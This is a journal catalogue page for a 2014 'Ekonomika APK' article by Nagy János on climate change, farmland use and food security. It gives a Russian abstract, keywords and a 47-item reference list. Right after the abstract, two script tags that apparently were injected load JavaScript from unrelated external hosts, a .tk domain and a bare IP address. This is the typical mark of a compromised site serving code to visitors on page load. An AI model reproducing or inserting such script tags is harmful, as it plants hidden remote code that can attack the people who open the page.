ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 632.11:332.3:338.43
Зарубіжний досвід розвитку аграрного виробництва

Изменение климата, использование сельскохозяйственных земель и продовольственная безопасность / Надь Янош // Экономика АПК. - 2014. - № 7 - С. 149

Для обеспечения потребностей мирового населения, которое к 2050 году достигнет 9 млрд чел., мировой уровень пищевого производства необходимо удвоить. В среднем, в соответствии с данными исследований OECD, FAO (2011) годовое увеличение аграрного производства в период до 2020 года будет составлять 1,7%, что значительно ниже по сравнению с предыдущим десятилетием (2,6%). Одновременно уровень потребления мяса, молочных продуктов, сахара и растительного масла может значительно увеличится до 2020 года. Из-за повышения цен на пищевые продукты предусматривается нарастание голода, уровень спроса на продовольствие значительно понизится, особенно в развитых странах, потребители будут покупать меньше продуктов питания, отдавая преимущество более дешевым из них. Также чрезвычайно актуальной становится проблема избыточного веса, отныне возможно увеличение неравенства населения по уровню здоровья. Продовольственная безопасность является одним из ключевых элементов адаптации к глобальным климатическим изменениям, поэтому особенно важным является поиск новых биологических ресурсов и развитие систем, направленных на облегчение процесса адаптации к новым условиям. Табл.: 1. Илл.: 3. Библиогр.: 47.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключевые слова: население, пищевое производство, использование земель, изменение климата, продовольственная безопасность

Список использованных источников

  1. Adams, R.M–Hurd, B.H.–Lenhart, S.–Leary, N. (1998): Effects of global climate change on agriculture: an interpretative review. Climate Research. 11: 19–30.
  2. ADAS (Agricultural Land Advisory Service) (2009): Analysis of Policy Instruments for Reducing Greenhouse Gas Emissions from Agriculture, Forestry and Land Management. Wolverhampton, UK, ADAS UK Ltd. RMP/5142.
  3. Bánsági É.–Domokos K. (2009): A klímaváltozás tíz meglepõ következménye. http://www.origo.hu/tudomany/20070816-klimavaltozas-tiz-meglepo-kovetkezmeny.html 2009-12-11
  4. Banse, M.–Van Meijl, H.–Tabeau, A.–Woltjer, G. (2008): Will EU biofuel policies affect global agricultural markets? Eur Rev Agricult Econ. 35: 117–141.
  5. Berbel, J.-Calatrava, J.-Garrido, A. (2007): Water Pricing and Irrigation: A Review of the European Experience. [In: Molle, F. and Berkoff, J. (eds). Irrigation Water Pricing: The Gap Between Theory and Practice.] CABI: Oxford.
  6. Boxall, A.B.A.–Hardy, A.–Beulke, S.–Boucard, T., Burgin, L.–Falloon, P.D. (2009): Impacts of climate change on indirect human exposure to pathogens and chemicals from agriculture. Environ Health Perspect. 117: 508–514.
  7. BruxInfo (2010): Eredeti ötletek a mezőgazdaság gázkibocsátásának csökkentésére, Brüsszel, http://www.bruxinfo.hu
  8. CEU-ENS (2007): A globális környezet középtávú gazdasági előrejelzése. A világ mezőgazdasága és az agrártermékek világkereskedelme (WTO). MTA Világgazdasági Kutatóintézet. 1–15.
  9. Chen, C.C.–McCarl, B.A. (2001): Pesticide usage as influenced by climate: a statistical investigation. Clim Change. 50: 475–487.
  10. Cummins, S.–Macintyre, S. (2006): Food environments and obesity—neighbourhood or nation? Int J Epidemiol. 35:100–104.
  11. Defra (Department for Environment, Food and Rural Affairs) (2011): New Diets for Cows Could Cut Climate Emissions. Available: http://www.defra.gov.uk/news/2011/04/01/cow-emissions/ [accessed 8 June 2011]
  12. Döll, P. (2002): Impact of climate change and variability on irrigation requirements: a global perspective. Clim Change. 54: 269–293.
  13. Easterling, W.E.–Aggarwal, P.K.–Batima, P.–Brander, K.M.–Erda, L.–Howden, S.M. (2007): Food, fibre and forest products. [In: Parry, M.L.–Canziani, O.F.–Palutikof, J.P.–van der Linden, P.J.–Hanson, C.E. (eds) Climate Change 2007: Impacts, Adaptation and Vulnerability Contribution of Working Group II to the Fourth Assessment Report of the Intergovernmental Panel on Climate Change]. Cambridge, UK, Cambridge University Press. 273–313.
  14. EEA (European Environment Agency) (2010): Europe’s Environment— state and outlook. Copenhagen.
  15. ENSZ (2006): World Population Growth, 1950–050. http://www.census.gov/population/international/data
  16. ENSZ (2011): Egy milliárd ember éhezik. http://www.origo.hu/nagyvilag/20100430-fao-ensz-egymilliard-ember-ehezik.html
  17. Európai Bizottság (2011): Élelmiszerbiztonság – A termelőtől a fogyasztóig. http://europa.eu/pol/food/index_hu.htm.
  18. FAO (2008): The state of food and agriculture 2008. Biofuels: prospects, risks and opportunities, FAO, Rome.
  19. FAO/WHO (Food and Agriculture Organization of the United Nations and the World Health Organizaton) (2006): Understanding the Codex Alimentarius. Third Edition. FAO, Rome.
  20. FAOSTAT (1900–2012): http://faostat.fao.org/
  21. FSA (Food Standards Agency) (2009a): A UK Survey of Campylobacter and Salmonella Contamination of Fresh Chicken at Retail Sale. London.
  22. FSA (Food Standards Agency) (2009b): Salt Reduction Strategy. Available: http://collections.europarchive.org/tna/20100927130941 /http://food.gov.uk/healthiereating/salt/strategy [accessed 3 March 2011]
  23. FSA (Food Standards Agency) (2010): WHO Salt Reduction Talks. Available: http://www.food.gov.uk/news/speeches/timsmithspeeches /whosaltreductiontalks [accessed 1 April 2011]
  24. FSA (Food Standards Agency) Food Surveys Published in 2011. (2012): Available: http://www.food.gov.uk/science/research/surveillance /fsisbranch2011/#.UF9dN1FrX4w [accessed 24 September 2012]
  25. Garnett T. (2008): Centre for Environmental Strategy. Cooking Up A Storm. Food, Greenhouse Gas Emissions and Our Changing Climate. University of Surrey, UK, 156.
  26. Haworth J. (2008): A globális felmelegedés okozta hőmérséklet emelkedés a „biztonságos határ kétszerese lesz” http://www.globalisfelmelegedes.info /index.php?option=com_content&task=view&id=251&Itemid=51
  27. Kovats, S.–Edwards, S.–Hajat, S.–Armstrong, B.–Ebi, K.L.–Menne, B. (2004a): The effect of temperature on food poisoning: time series analysis in 10 European countries. Epidemiol. Infect. 132: 443–453.
  28. Kovats, S–Wolf, T.–Menne, B. (2004b): Heatwave of August 2003 in Europe: provisional estimates of the impact on mortality. Eurosurveillance Weekly. 8.
  29. KSH Statisztikai évkönyvek (1950–2012)
  30. Láng I.–Jolánkai M.–Csete L. (2007): A globális klíma voltozás–hazai hatások és válaszok–A VAHAVA jelentés. Szaktudás Kiadó Ház Rt. Bp.
  31. Lock, K.–Stuckler, D. Charlesworth, K.–McKee, M. (2009): Potential causes and health effects of rising global food prices. BMJ 339b2403doi:[Online 13 July 2009] doi: 10.1136/bmj.b2403.
  32. Marvin, H.J.P.–Kleter, G.A.–Prandini, A.–Dekkers, S.–Bolton, D.J. (2009): Early identification systems for emerging foodborne hazards. Food Chem Toxicol. 47: 915–926.
  33. Mintel (2003a): Mintel International Group Limited, London. Drinks Market–UK–November 2003.
  34. Mintel (2003b): Mintel International Group Limited, London. Pre-packed and Dressed Salads–UK–October 2003.
  35. OECD–FAO (2011): Mezőgazdasági kitekintés 2011–2020.
  36. Pendrous, R. (2009): It’s Time for FSA Salt Reduction Targets to Take a Reality Check. Available: http://www.foodmanufacture.co.uk /Business-News/It-s-time-for-FSA-salt-reduction-targets-to-take-a-reality-check [accessed 1 December 2009]
  37. Rajagopal, D.–Zilberman, D. (2007): Review of Environmental, Economic and Policy Aspects of Biofuels, Policy Research Working. The World Bank, Washington, D.C. 4341.
  38. Russell, R.–Paterson, M.–Lima, N. (2010): How will climate change affect mycotoxins in food? Food Res Int. 43: 1902–1914.
  39. Somlyódi L. (2011): Vízdilemma a világban és Magyarországon. MTA Hírlevél, http://mta.hu/tudomany_hirei/vizdilemma-a-vilagban-es-magyarorszagon-126876/
  40. Sorda, G.–Banse, D.-Kemfert, C. (2010): An Overview of Biofuel Policies Across the World, Energy Policy. 38. 11: 6977–6988.
  41. Szajkowska, A. (2009): From mutual recognition to mutual scientific opinion? Constitutional framework for risk analysis in EU food safety law. Food Policy. 34: 529–538.
  42. Tirado, M.C.–Clarke, R.–Jaykus, L.A.–McQuatters-Gollop, A.–Frank, J.M. (2010): Climate change and food safety: a review. Food Res Int. 43: 1745–1765.
  43. Varga-Haszonits Z. (2005): Az éghajlat változékonysága és az agroökoszisztémák. Agro-21 füzetek. 41:29–37.
  44. Vass N.–Czeglédi L.–Jávor A. (2008): Az állati eredetű funkcionális élelmiszerek jelentősége a humán táplálkozásban. [In. Nagy J.–Schmidt J.–Jávor A. (szerk.) A jövő élelmiszerei és az egészség.]. DE AGTC, Debrecen, 49–66.
  45. WHO (World Health Organization) (2006): WHO Guidelines for the Safe Use of Wastewater, Excreta and Greywater. Volume II: Wastewater Use in Agriculture. Geneva.
  46. WHO, UNESCO (2010): A víz Világnapja - Március 22. http://antalvali.com/hirek/a-viz-vilagnapja.html
  47. World Cancer Research Fund/American Institute for Cancer Research. (2007): Food, Nutrition, Physical Activity, and the Prevention of Cancer. A Global Perspective. American Institute for Cancer Research, Washington.
Читать статью: 14_07_149-157.pdf